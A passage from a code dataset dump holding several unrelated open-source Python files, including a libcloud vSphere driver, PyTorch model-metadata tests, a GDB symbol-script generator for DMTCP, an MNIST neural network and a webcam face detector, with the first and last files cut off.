to.\n :type host: ``str``\n\n :param priority: Migration task priority. Possible values: default,\n high, low.\n :type priority: ``str``\n\n :return: True on success.\n :rtype: ``bool``\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n vm.migrate(priority=priority, resource_pool=resource_pool, host=host)\n\n return True\n\n @wrap_non_libcloud_exceptions\n def reboot_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.reset()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def destroy_node(self, node, ex_remove_files=True):\n \"\"\"\n :param ex_remove_files: Remove all the files from the datastore.\n :type ex_remove_files: ``bool``\n \"\"\"\n ex_remove_files = False\n vm = self._get_vm_for_node(node=node)\n\n server = self.connection.client\n\n # Based on code from\n # https://pypi.python.org/pypi/pyxenter\n if ex_remove_files:\n request = VI.Destroy_TaskRequestMsg()\n\n _this = request.new__this(vm._mor)\n _this.set_attribute_type(vm._mor.get_attribute_type())\n request.set_element__this(_this)\n ret = server._proxy.Destroy_Task(request)._returnval\n task = VITask(ret, server)\n\n # Wait for the task to finish\n status = task.wait_for_state([task.STATE_SUCCESS,\n task.STATE_ERROR])\n\n if status == task.STATE_ERROR:\n raise LibcloudError('Error destroying node: %s' %\n (task.get_error_message()))\n else:\n request = VI.UnregisterVMRequestMsg()\n\n _this = request.new__this(vm._mor)\n _this.set_attribute_type(vm._mor.get_attribute_type())\n request.set_element__this(_this)\n ret = server._proxy.UnregisterVM(request)\n task = VITask(ret, server)\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_stop_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.power_off()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_start_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.power_on()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_suspend_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.suspend()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_get_resource_pools(self):\n \"\"\"\n Return all the available resource pools.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_resource_pools()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_resource_pool_name(self, node):\n \"\"\"\n Retrieve resource pool name for the provided node.\n\n :rtype: ``str``\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n return vm.get_resource_pool_name()\n\n @wrap_non_libcloud_exceptions\n def ex_get_hosts(self):\n \"\"\"\n Return all the available hosts.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_hosts()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_datastores(self):\n \"\"\"\n Return all the available datastores.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_datastores()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_node_by_path(self, path):\n \"\"\"\n Retrieve Node object for a VM with a provided path.\n\n :type path: ``str``\n :rtype: :class:`libcloud.compute.base.Node`\n \"\"\"\n vm = self.connection.client.get_vm_by_path(path)\n node = self._to_node(vm=vm)\n return node\n\n def ex_get_node_by_uuid(self, uuid):\n \"\"\"\n Retrieve Node object for a VM with a provided uuid.\n\n :type uuid: ``str``\n \"\"\"\n vm = self._get_vm_for_uuid(uuid=uuid)\n node = self._to_node(vm=vm)\n return node\n\n @wrap_non_libcloud_exceptions\n def ex_get_server_type(self):\n \"\"\"\n Return VMware installation type.\n\n :rtype: ``str``\n \"\"\"\n return self.connection.client.get_server_type()\n\n @wrap_non_libcloud_exceptions\n def ex_get_api_version(self):\n \"\"\"\n Return API version of the vmware provider.\n\n :rtype: ``str``\n \"\"\"\n return self.connection.client.get_api_version()\n\n def _get_vm_for_uuid(self, uuid, datacenter=None):\n \"\"\"\n Retrieve VM for the provided UUID.\n\n :type uuid: ``str``\n \"\"\"\n server = self.connection.client\n\n dc_list = []\n if datacenter and VIMor.is_mor(datacenter):\n dc_list.append(datacenter)\n else:\n dc = server.get_datacenters()\n if datacenter:\n dc_list = [k for k, v in dc.iteritems() if v == datacenter]\n else:\n dc_list = list(dc.iterkeys())\n\n for mor_dc in dc_list:\n request = VI.FindByUuidRequestMsg()\n search_index = server._do_service_content.SearchIndex\n mor_search_index = request.new__this(search_index)\n mor_search_index.set_attribute_type(MORTypes.SearchIndex)\n request.set_element__this(mor_search_index)\n\n mor_datacenter = request.new_datacenter(mor_dc)\n mor_datacenter.set_attribute_type(MORTypes.Datacenter)\n request.set_element_datacenter(mor_datacenter)\n\n request.set_element_vmSearch(True)\n request.set_element_uuid(uuid)\n\n try:\n vm = server._proxy.FindByUuid(request)._returnval\n except VI.ZSI.FaultException:\n pass\n else:\n if vm:\n return VIVirtualMachine(server, vm)\n\n return None\n\n def _to_nodes(self, vm_paths):\n nodes = []\n for vm_path in vm_paths:\n vm = self.connection.client.get_vm_by_path(vm_path)\n node = self._to_node(vm=vm)\n nodes.append(node)\n\n return nodes\n\n def _to_node(self, vm):\n assert(isinstance(vm, VIVirtualMachine))\n\n properties = vm.get_properties()\n status = vm.get_status()\n\n uuid = vm.properties.config.uuid\n instance_uuid = vm.properties.config.instanceUuid\n\n id = uuid\n name = properties['name']\n public_ips = []\n private_ips = []\n\n state = self.NODE_STATE_MAP.get(status, NodeState.UNKNOWN)\n ip_address = properties.get('ip_address', None)\n net = properties.get('net', [])\n resource_pool_id = str(vm.properties.resourcePool._obj)\n\n try:\n operating_system = vm.properties.summary.guest.guestFullName,\n except Exception:\n operating_system = 'unknown'\n\n extra = {\n 'uuid': uuid,\n 'instance_uuid': instance_uuid,\n 'path': properties['path'],\n 'resource_pool_id': resource_pool_id,\n 'hostname': properties.get('hostname', None),\n 'guest_id': properties['guest_id'],\n 'devices': properties.get('devices', {}),\n 'disks': properties.get('disks', []),\n 'net': net,\n\n 'overall_status': vm.properties.overallStatus,\n 'operating_system': operating_system,\n\n 'cpus': vm.properties.config.hardware.numCPU,\n 'memory_mb': vm.properties.config.hardware.memoryMB\n }\n\n # Add primary IP\n if ip_address:\n if is_public_subnet(ip_address):\n public_ips.append(ip_address)\n else:\n private_ips.append(ip_address)\n\n # Add other IP addresses\n for nic in net:\n ip_addresses = nic['ip_addresses']\n for ip_address in ip_addresses:\n try:\n is_public = is_public_subnet(ip_address)\n except Exception:\n # TODO: Better support for IPv6\n is_public = False\n\n if is_public:\n public_ips.append(ip_address)\n else:\n private_ips.append(ip_address)\n\n # Remove duplicate IPs\n public_ips = list(set(public_ips))\n private_ips = list(set(private_ips))\n\n node = Node(id=id, name=name, state=state, public_ips=public_ips,\n private_ips=private_ips, driver=self, extra=extra)\n return node\n\n def _get_vm_for_node(self, node):\n uuid = node.id\n vm = self._get_vm_for_uuid(uuid=uuid)\n return vm\n\n def _ex_connection_class_kwargs(self):\n kwargs = {\n 'url': self.url\n }\n\n return kwargs\n\n\nclass VSphere_5_5_NodeDriver(VSphereNodeDriver):\n name = 'VMware vSphere v5.5'\n","repo_name":"Psiphon-Inc/psiphon-automation","sub_path":"Automation/libcloud/libcloud/compute/drivers/vsphere.py","file_name":"vsphere.py","file_ext":"py","file_size_in_byte":16515,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"16"} +{"seq_id":"22863633488","text":"import os\nfrom typing import Any, Dict, Generator, List, Union\n\nfrom modelscope.pipelines.base import Input, Pipeline\nfrom modelscope.utils.constant import Hubs\nfrom modelscope.utils.device import create_device\nfrom modelscope.utils.hub import snapshot_download\n\n\nclass DiffusersPipeline(Pipeline):\n\n def __init__(self, model: str, device: str = 'gpu', **kwargs):\n \"\"\"\n use `model` to create a diffusers pipeline\n Args:\n model: model id on modelscope hub or local dir.\n device: str = 'gpu'\n \"\"\"\n\n self.device_name = device\n self.cfg = None\n self.preprocessor = None\n self.framework = None\n self.device = create_device(self.device_name)\n self.hubs = kwargs.get('hubs', Hubs.modelscope)\n\n # make sure we download the model from modelscope hub\n model_folder = model\n if not os.path.isdir(model_folder):\n if self.hubs != Hubs.modelscope:\n raise NotImplementedError(\n 'Only support model retrieval from ModelScope hub for now.'\n )\n model_folder = snapshot_download(model)\n\n self.model = model_folder\n self.models = [self.model]\n self.has_multiple_models = len(self.models) > 1\n\n def preprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n return inputs\n\n def postprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n return inputs\n\n def __call__(self, input: Union[Input, List[Input]], *args,\n **kwargs) -> Union[Dict[str, Any], Generator]:\n preprocess_params, forward_params, postprocess_params = self._sanitize_parameters(\n **kwargs)\n self._check_input(input)\n out = self.preprocess(input, **preprocess_params)\n out = self.forward(out, **forward_params)\n out = self.postprocess(out, **postprocess_params)\n self._check_output(out)\n return out\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/pipelines/multi_modal/diffusers_wrapped/diffusers_pipeline.py","file_name":"diffusers_pipeline.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"71017102729","text":"#!/usr/bin/env python\n\n# Usage: python THIS_FILE PID > GDB_SCRIPT\n# OR: THIS_FILE PID > GDB_SCRIPT\n# Invoke this on a running process, prior to checkpoint.\n# This creates a GDB_SCRIPT file that can restore the debugging\n# information during restart. On restart, do:\n# (gdb) source GDB_SCRIPT\n\nimport sys\nimport subprocess\nimport re\nimport os\n\ndef is_executable(filename):\n # 16 bytes for ELF magic number; then 2 bytes (short) for ELF type\n header = open(filename, \"rb\")\n elf_magic_number = header.read(16)\n elf_type = header.read(2)\n # Is it little-endian or big-endian\n elf_type = elf_type[0] if sys.byteorder == \"little\" else elf_type[1]\n # Handle both Python2.7 and Python3: type 2 is executable; type 3 is .so file\n elf_type = elf_type if isinstance(elf_type, int) else ord(elf_type)\n return elf_type == 2\n\n# FROM: https://stackoverflow.com/questions/33049201/gdb-add-symbol-file-all-sections-and-load-address\ndef relocatesections(filename):\n p = subprocess.Popen([\"readelf\", \"-S\", filename], stdout = subprocess.PIPE)\n sections = []\n textaddr = '0'\n for line in p.stdout.readlines():\n line = line.decode(\"utf-8\").strip()\n if not line.startswith('['):\n continue\n if line.startswith('[ 0]') or line.startswith('[Nr]'):\n continue\n line = line.replace(\"[ \", \"[\", 1)\n\n fieldsvalue = line.split()\n fieldsname = ['number', 'name', 'type', 'addr', 'offset', 'size',\n 'entsize', 'flags', 'link', 'info', 'addralign']\n sec = dict(zip(fieldsname, fieldsvalue))\n if not sec['name'].startswith(\".\"):\n continue\n if \".note\" in sec['name']:\n continue\n sections.append(sec)\n if sec['name'] == '.text':\n textaddr = sec['addr']\n return (textaddr, sections)\n\n\ndef writeSymbolFileToScript(filename_substring):\n (filename, base_addr) = memory_region(filename_substring)\n if is_executable(filename):\n base_addr = 0 # ELF executables already hard-wired absolute address\n (textaddr, sections) = relocatesections(filename)\n cmd = \"add-symbol-file %s 0x%x\" % (filename, int(textaddr, 16) + base_addr)\n for s in sections:\n addr = int(s['addr'], 16)\n if s['name'] == '.text' or addr == 0:\n continue\n cmd += \" -s %s 0x%x\" % (s['name'], addr + base_addr)\n print(cmd + \"\\n\")\n\n\ndef saveSymbolFilesToGdbScript():\n if len(sys.argv) != 2:\n sys.stderr.write(\"Usage: %s PID > gdb_script_file\\n\" % sys.argv[0])\n sys.exit(1)\n procmaps_file = \"/proc/\" + getpid() + \"/maps\"\n if (not os.path.isfile(procmaps_file)):\n sys.stderr.write(\"No such file: \" + procmaps_file + \"\\n\")\n sys.exit(1)\n if (not os.access(procmaps_file, os.R_OK)):\n sys.stderr.write(\"No read permission on file: \" + procmaps_file + \"\\n\")\n sys.exit(1)\n\n print(\"# GDB script; Either 'gdb -x THIS_FILE' or: (gdb) source THIS_FILE\\n\")\n for (filename, _) in memory_regions():\n writeSymbolFileToScript(filename)\n\n# Helper functions for writeSymbolFileToScript\ndef getpid():\n return sys.argv[1]\n\n# This returns a pair: (FILENAME_OR_LIBNAME, ADDRESS)\ndef procmap_filename_address(line):\n return (\"/\"+line.split(\" /\")[-1], int(\"0x\"+line.split(\"-\")[0], 16))\ndef memory_regions():\n p = subprocess.Popen([\"cat\", \"/proc/\"+getpid()+\"/maps\"],\n stdout = subprocess.PIPE)\n procmap_lines = [line.decode(\"utf-8\").strip()\n for line in p.stdout.readlines()]\n return [procmap_filename_address(memory) for memory in procmap_lines\n if \" /\" in memory and \"r-x\" in memory]\n\ndef memory_region(filename_substring):\n regions = memory_regions()\n return [region for region in regions if filename_substring in region[0]][0]\n\nsaveSymbolFilesToGdbScript()\n","repo_name":"dmtcp/dmtcp","sub_path":"util/save-symbol-files-to-gdb-script.py","file_name":"save-symbol-files-to-gdb-script.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":343,"dataset":"github-code","pt":"16"} +{"seq_id":"34343327028","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_iris, load_boston\nimport pandas as pd\nimport numpy as np\n\nfrom ai_metadata import ModelSerialization, MiningFunction, MetadataModel\n\nseed = 123456\ntest_size = 0.33\n\n\ndef get_classifier():\n import torch.nn as nn # PyTorch's module wrapper\n\n class Classifier(nn.Module):\n def __init__(self):\n super(Classifier, self).__init__()\n self.h_layer = nn.Linear(4, 3)\n self.s_layer = nn.Softmax()\n\n def forward(self, x):\n y = self.h_layer(x)\n p = self.s_layer(y)\n return p\n\n return Classifier()\n\n\ndef get_net():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n import torch.nn.functional as F\n\n class Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.dropout1 = nn.Dropout2d(0.25)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(9216, 128)\n self.fc2 = nn.Linear(128, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout2(x)\n x = self.fc2(x)\n output = F.log_softmax(x, dim=1)\n return output\n\n return Net()\n\n\ndef test_classification():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n from torch.autograd import Variable # PyTorch's implementer of gradient descent and back\n\n X, y = load_iris(return_X_y=True)\n Y = pd.get_dummies(y).values\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)\n\n X_train_v = Variable(torch.FloatTensor(X_train), requires_grad=False)\n y_train_v = Variable(torch.FloatTensor(y_train), requires_grad=False)\n X_test_v = Variable(torch.FloatTensor(X_test), requires_grad=False)\n y_test_v = Variable(torch.FloatTensor(y_test), requires_grad=False)\n\n classifier = get_classifier() # declaring the classifier to an object\n loss_fn = nn.BCELoss() # calculates the loss\n optim = torch.optim.SGD(classifier.parameters(), lr=0.01)\n\n for num in range(100): # 100 iterations\n pred = classifier(X_train_v) # predict\n loss = loss_fn(pred, y_train_v) # calculate loss\n optim.zero_grad() # zero gradients to not accumulate\n loss.backward() # update weights based on loss\n optim.step() # update optimiser for next iteration\n\n model = MetadataModel.wrap(classifier,\n x_test=X_test,\n y_test=y_test,\n source_object=get_classifier)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'] == [\n {\n \"name\": None,\n \"sample\": [\n [\n 5.7,\n 4.4,\n 1.5,\n 0.4\n ]\n ],\n \"type\": \"float64\",\n \"shape\": [\n None,\n 4\n ]\n }\n ]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": [\n 1,\n 0,\n 0\n ],\n \"type\": \"uint8\",\n \"shape\": [\n None,\n 3\n ]\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float32\",\n \"shape\": [\n None,\n 3\n ]\n }\n ]\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['object_name'] == 'get_classifier'\n assert model_metadata['object_source']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.CLASSIFICATION\n assert model.save_model('./pytorch-cls')\n\n\ndef test_regression():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n\n X, y = load_boston(return_X_y=True)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=seed)\n\n torch.set_default_dtype(torch.float64)\n\n dim = X.shape[1]\n net = nn.Sequential(\n nn.Linear(dim, 50, bias=True), nn.ELU(),\n nn.Linear(50, 50, bias=True), nn.ELU(),\n nn.Linear(50, 50, bias=True), nn.Sigmoid(),\n nn.Linear(50, 1)\n )\n criterion = nn.MSELoss()\n opt = torch.optim.Adam(net.parameters(), lr=.0005)\n y_train_t = torch.from_numpy(y_train).clone().reshape(-1, 1)\n x_train_t = torch.from_numpy(X_train).clone()\n\n losssave = []\n stepsave = []\n\n for i in range(100):\n y_hat = net(x_train_t)\n loss = criterion(y_train_t, net(x_train_t))\n losssave.append(loss.item())\n stepsave.append(i)\n loss.backward()\n opt.step()\n opt.zero_grad()\n y_hat_class = (y_hat.detach().numpy())\n accuracy = np.sum(y_train.reshape(-1, 1) == y_hat_class) / len(y_train)\n if i > 0 and i % 100 == 0:\n print('Epoch %d, loss = %g acc = %g ' % (i, loss, accuracy))\n\n model = MetadataModel.wrap(net,\n x_test=X_test,\n y_test=y_test)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'] == [\n {\n \"name\": None,\n \"sample\": [\n [\n 22.5971,\n 0.0,\n 18.1,\n 0.0,\n 0.7,\n 5.0,\n 89.5,\n 1.5184,\n 24.0,\n 666.0,\n 20.2,\n 396.9,\n 31.99\n ]\n ],\n \"type\": \"float64\",\n \"shape\": [\n None,\n 13\n ]\n }\n ]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": 7.4,\n \"type\": \"float64\",\n \"shape\": None\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float64\",\n \"shape\": [\n None,\n 1\n ]\n }\n ]\n\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.REGRESSION\n assert model.save_model('./pytorch-reg')\n\n\ndef test_mnist():\n import torch\n import torch.optim as optim\n from torchvision import datasets, transforms\n from torch.optim.lr_scheduler import StepLR\n\n use_cuda = torch.cuda.is_available()\n batch_size = 64\n lr = 1.0\n gamma = 0.7\n epochs = 1\n\n torch.manual_seed(seed)\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'batch_size': batch_size}\n if use_cuda:\n kwargs.update({'num_workers': 1,\n 'pin_memory': True,\n 'shuffle': True},\n )\n\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n dataset1 = datasets.MNIST('./data', train=True, download=True, transform=transform)\n dataset2 = datasets.MNIST('./data', train=False, transform=transform)\n train_loader = torch.utils.data.DataLoader(dataset1, **kwargs)\n test_loader = torch.utils.data.DataLoader(dataset2, **kwargs)\n\n net = get_net().to(device)\n optimizer = optim.Adadelta(net.parameters(), lr=lr)\n\n scheduler = StepLR(optimizer, step_size=1, gamma=gamma)\n\n for epoch in range(1, epochs + 1):\n run_train(net, device, train_loader, optimizer)\n run_test(net, device, test_loader)\n scheduler.step()\n\n examples = enumerate(test_loader)\n batch_idx, (x_test, y_test) = next(examples)\n\n model = MetadataModel.wrap(net,\n x_test=x_test,\n y_test=y_test,\n source_object=get_net)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'][0]['shape'] == [None, 1, 28, 28]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": 7,\n \"type\": \"int64\",\n \"shape\": None\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float64\",\n \"shape\": [\n None,\n 10\n ]\n }\n ]\n\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['object_name'] == 'get_net'\n assert model_metadata['object_source']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.CLASSIFICATION\n assert model.save_model('./pytorch-mnist')\n\n\ndef run_train(model, device, train_loader, optimizer):\n import torch.nn.functional as F\n\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n\ndef run_test(model, device, test_loader):\n import torch\n import torch.nn.functional as F\n\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n","repo_name":"autodeployai/ai-metadata","sub_path":"test/test_pytorch.py","file_name":"test_pytorch.py","file_ext":"py","file_size_in_byte":10908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27607881578","text":"K = int(input())\nlst = list(input().split())\n\nans_min = 10**10\nans_max = -10**10\n\n\ndef dfs(idx, string):\n global ans_min, ans_max\n if idx == K+1:\n ans_min = min(ans_min, int(string))\n ans_max = max(ans_max, int(string))\n return\n\n for i in range(10):\n if not visited[i]:\n if idx == 0:\n visited[i] = 1\n dfs(idx + 1, string + str(i))\n visited[i] = 0\n\n else:\n if eval(string[idx-1] + lst[idx-1] + str(i)):\n visited[i] = 1\n dfs(idx + 1, string + str(i))\n visited[i] = 0\n\n\nvisited = [0] * 10\ndfs(0, '')\nprint(str(ans_max).zfill(K+1))\nprint(str(ans_min).zfill(K+1))","repo_name":"nimunsang/Algorithm","sub_path":"Implementation/2529.py","file_name":"2529.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9375739453","text":"from data import *\n\nimages, labels, images_test, labels_test, images_validate, labels_validate = load_data()\n\n# 3 hidden layer\n# 784 -> 40 -> 30 -> 10 -> 10\nINPUTLAYER = 784\nHIDDENLAYER1 = 40\nHIDDENLAYER2 = 30\nHIDDENLAYER3 = 20\nOUTPUTLAYER = 10\n\n# global weights and biases for each layer\nweights_in_to_h1 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER1, INPUTLAYER))\nweights_h1_to_h2 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER2, HIDDENLAYER1))\nweights_h2_to_h3 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER3, HIDDENLAYER2))\nweights_h3_to_out = np.random.uniform(-0.5, 0.5, (OUTPUTLAYER, HIDDENLAYER3))\nbias_in_to_h1 = np.zeros((HIDDENLAYER1, 1))\nbias_h1_to_h2 = np.zeros((HIDDENLAYER2, 1))\nbias_h2_to_h3 = np.zeros((HIDDENLAYER3, 1))\nbias_h3_to_out = np.zeros((OUTPUTLAYER, 1))\n\n# for plotting accuracy vs epoch\nrecord_train = []\nrecord_validate = []\nrecord_cost = []\n\n\ndef forward_propagation(image):\n # multiply weights by the input matrix: weights_in_to_h1 @ image\n # add the bias: + bias_in_to_h1\n # run it through an activation function to normalize, we are using sigmoid\n\n # Forward propagation input -> hidden1\n hidden1 = sigmoid(bias_in_to_h1 + weights_in_to_h1 @ image)\n # Forward propagation hidden1 -> hidden2\n hidden2 = sigmoid(bias_h1_to_h2 + weights_h1_to_h2 @ hidden1)\n # Forward propagation hidden2 -< hidden3\n hidden3 = sigmoid(bias_h2_to_h3 + weights_h2_to_h3 @ hidden2)\n # Forward propagation hidden3 -> output\n output = sigmoid(bias_h3_to_out + weights_h3_to_out @ hidden3)\n\n return output, hidden1, hidden2, hidden3\n\n\ndef backward_propagation(img, label, output, hidden1, hidden2, hidden3):\n # make sure we are grabbing the weights defined globally\n global weights_in_to_h1, weights_h1_to_h2, weights_h2_to_h3, weights_h3_to_out\n global bias_in_to_h1, bias_h1_to_h2, bias_h2_to_h3, bias_h3_to_out\n\n # TODO: employ validation tester results to this instead\n # Backpropagation output -> hidden3 (cost function derivative)\n delta_output = output - label\n weights_h3_to_out += -learn_rate * delta_output @ np.transpose(hidden3)\n bias_h3_to_out += -learn_rate * delta_output\n\n # Backpropagation hidden3 -> hidden2 (activation function derivative)\n delta_hidden3 = np.transpose(weights_h3_to_out) @ delta_output * deriv_sigmoid(hidden3)\n weights_h2_to_h3 += -learn_rate * delta_hidden3 @ np.transpose(hidden2)\n bias_h2_to_h3 += -learn_rate * delta_hidden3\n\n # Backpropagation hidden2 -> hidden1 (activation function derivative)\n delta_hidden2 = np.transpose(weights_h2_to_h3) @ delta_hidden3 * deriv_sigmoid(hidden2)\n weights_h1_to_h2 += -learn_rate * delta_hidden2 @ np.transpose(hidden1)\n bias_h1_to_h2 += -learn_rate * delta_hidden2\n\n # Backpropagation hidden1 -> input (activation function derivative)\n delta_hidden1 = np.transpose(weights_h1_to_h2) @ delta_hidden2 * deriv_sigmoid(hidden1)\n weights_in_to_h1 += -learn_rate * delta_hidden1 @ np.transpose(img)\n bias_in_to_h1 += -learn_rate * delta_hidden1\n\n\n# main training code ----------------------------------------------------------\nlearn_rate = LEARNING_RATE\nepochs = EPOCHS\nnum_correct = 0\nfor epoch in range(epochs):\n error_avg_sum = 0\n for img, label in zip(images, labels):\n # needed to change from vector to a matrix\n img.shape += (1,)\n label.shape += (1,)\n\n # Forward propagation -----------------------------\n output, hidden1, hidden2, hidden3 = forward_propagation(img)\n\n # Loss + Error calculation\n error_avg_sum += mean_squared_error(output, label)[0]\n num_correct += int(np.argmax(output) == np.argmax(label))\n\n # Backpropagation ---------------------------------\n backward_propagation(img, label, output, hidden1, hidden2, hidden3)\n\n # Show accuracy for this epoch\n accuracy = round((num_correct / images.shape[0]) * 100, 2)\n num_correct = 0\n # Calculate average loss for this epoch\n error_rate = round((error_avg_sum / SPLIT_TRAIN_SIZE) * 100, 2)\n # Validate against validation set for this epoch\n sum_of_correct_preds = tester(images_validate, labels_validate, forward_propagation)\n validate_length = len(images_validate)\n validation_accuracy = round(sum_of_correct_preds / validate_length * 100, 2)\n print(f\"{epoch+1}\\tAcc: {accuracy}%\\tValidation: {validation_accuracy}%\\tAvg Loss: {error_rate}\")\n\n record_train.append((epoch, accuracy))\n record_validate.append((epoch, validation_accuracy))\n record_cost.append((epoch, error_rate))\n\n\n\n# Testing on test set\nsum_of_correct_preds = tester(images_test, labels_test, forward_propagation)\ntest_length = len(images_test)\ntesting_set_acc = round(sum_of_correct_preds / test_length * 100, 2)\nprint(f\"Testing set accuracy: {testing_set_acc}%\")\n\n\n\nchat_bot_dict = {\n 1: 'DEEZ NODES SAY THAT',\n 2: '...',\n 3: 'HELLO FRIEND!',\n 4: 'USER, I BELIEVE'\n}\n\n# Show results ctrl-c out or 20 times\n#while True:\nif SHOWTEST == True:\n for i in range(20):\n #index = int(input(\"Enter a number (0 - 59999): \"))\n index = np.random.randint(0, len(img))\n img = images[index]\n plt.imshow(img.reshape(28, 28), cmap=\"Greys\")\n\n img.shape += (1,)\n output, hidden1, hidden2, hidden3 = forward_propagation(img)\n\n text = chat_bot_dict[np.random.randint(1, 5)]\n plt.title(f\"{text} THE ANSWER IS: {output.argmax()} :D\")\n plt.show()\n","repo_name":"afnleaf/MNIST_NeuralNet","sub_path":"nn_3layer.py","file_name":"nn_3layer.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18516507496","text":"import cv2\r\n\r\ncas_classifier = cv2.CascadeClassifier('HAARCascadeFaceDetection/haarcascade_frontalface_default.xml')\r\ncap = cv2.VideoCapture(0)\r\n# Capture frame-by-frame\r\nwhile True:\r\n ret, frame = cap.read()\r\n gray = cv2.cvtColor(frame, 0)\r\n detections = cas_classifier.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=5)\r\n if(len(detections) > 0):\r\n (x,y,w,h) = detections[0]\r\n frame = cv2.rectangle(frame,(x,y),(x+w,y+h),(150,0,150),2)\r\n cv2.imshow('frame',frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n \tbreak\r\n\r\n#release the capture\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"ManavTriesStuff/FaceDetection","sub_path":"FaceDetect.py","file_name":"FaceDetect.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42634689727","text":"from turtle import *\ntela = Screen()\ncao = Turtle()\ncao.color(\"red\")\ncao.forward(70)\ncao.right(90)\ncao.forward(200)\ngato = Turtle()\ngato.color(\"blue\")\ngato.right(90)\ngato.forward(200)\ngato.left(90)\ngato.forward(70)\nlebre = Turtle()\nlebre.color(\"green\")\nlebre.forward(120)\nlebre.right(90)\nlebre.forward(200)\nlebre.right(90)\nlebre.forward(50)\npangolim = 